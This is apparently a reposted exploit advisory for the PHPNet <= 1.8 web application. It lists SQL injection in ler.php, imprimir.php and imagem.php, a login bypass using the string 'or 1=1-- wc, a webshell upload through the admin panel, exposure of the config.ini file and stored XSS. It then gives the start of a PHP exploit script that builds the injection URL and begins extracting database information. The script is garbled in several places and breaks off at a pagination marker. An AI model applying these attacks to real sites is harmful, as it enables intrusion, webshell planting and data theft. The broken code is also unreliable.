PHPNet <= 1.8 (ler.php) SQL injection and fix-vulnerability warning-the black bar safety net

2012-06-13T00:00:00
ID MYHACK58:62201234102
Type myhack58
Reporter 佚名
Modified 2012-06-13T00:00:00

Description

<? php

Title: PHPNet < = 1.8 (ler.php) SQL Injection

Author WhiteCollarGroup

Developer: http://www.phpnet.com.br/

Download address: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos

Affected version: 1.8

Test platform: Debian GNU/Linux,Windows 7 Ultimate

/*

This system, we discovered multiple sql injection

~> SQL Injection

This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php.

ler. php? id=[SQLi]

imprimir. php? id=[SQLi]

imagem has. php? id=[SQLi]

Example

php file.php http://www.xxx.com /path/

~> Login bypass

In the login page, you can bypass the login using the "SQLi strings".

Go to http:// www.xxx.com /path/admin/login.php

Login: 'or 1=1-- wc

Pass: wcgroup

~> arbitrary file upload

After open the administration panel, try to add a new article.

Use the upload form to upload your webshell.

After posting, access:

http://server/path/tmp/your_shell_filename.php

~> information disclosure

Access:

http://server/path/conf/config.ini

~> XSS Stored (persistent)

When posting a new article, you can post (D)HTML/Javascript codes on the page.

*/

function _printf($str) {

echo $str."\ n";

}

function hex($string){

$hex="; // PHP 'Dim' =]

for ($i=0; $i < strlen($string); $i++){

$hex .= dechex(ord($string[$i]));

}

return '0x'.$ hex;

}

set_time_limit(0);

error_reporting(E_ERROR &E_USER_WARNING);

@ini_set('default_socket_timeout', 3 0);

echo "\n";

echo "PHPNet < = 1.8 SQLi Exploit\n";

echo "Discovered by WhiteCollarGroup\n";

echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com";

if($argc!= 2) {

_printf("Usage:");

_printf("php $argv[0] <target>");

_printf("Example:");

_printf("php $argv[0] http:// www.xxx.com /path/");

exit;

}

$target = $argv[1];

if(substr($target, (strlen($target)-1))!="/") { // se o ultimo caractere nao for uma barra

$target .= "/";

}

$inject = $target . "ler. php? id=-0'%2 0";

$token = uniqid();

$token_hex = hex($token);

// vamos agora obter os seguintes dados: user() version()

echo "\n\n[*] Trying to get informations...\n";

[1] [2] next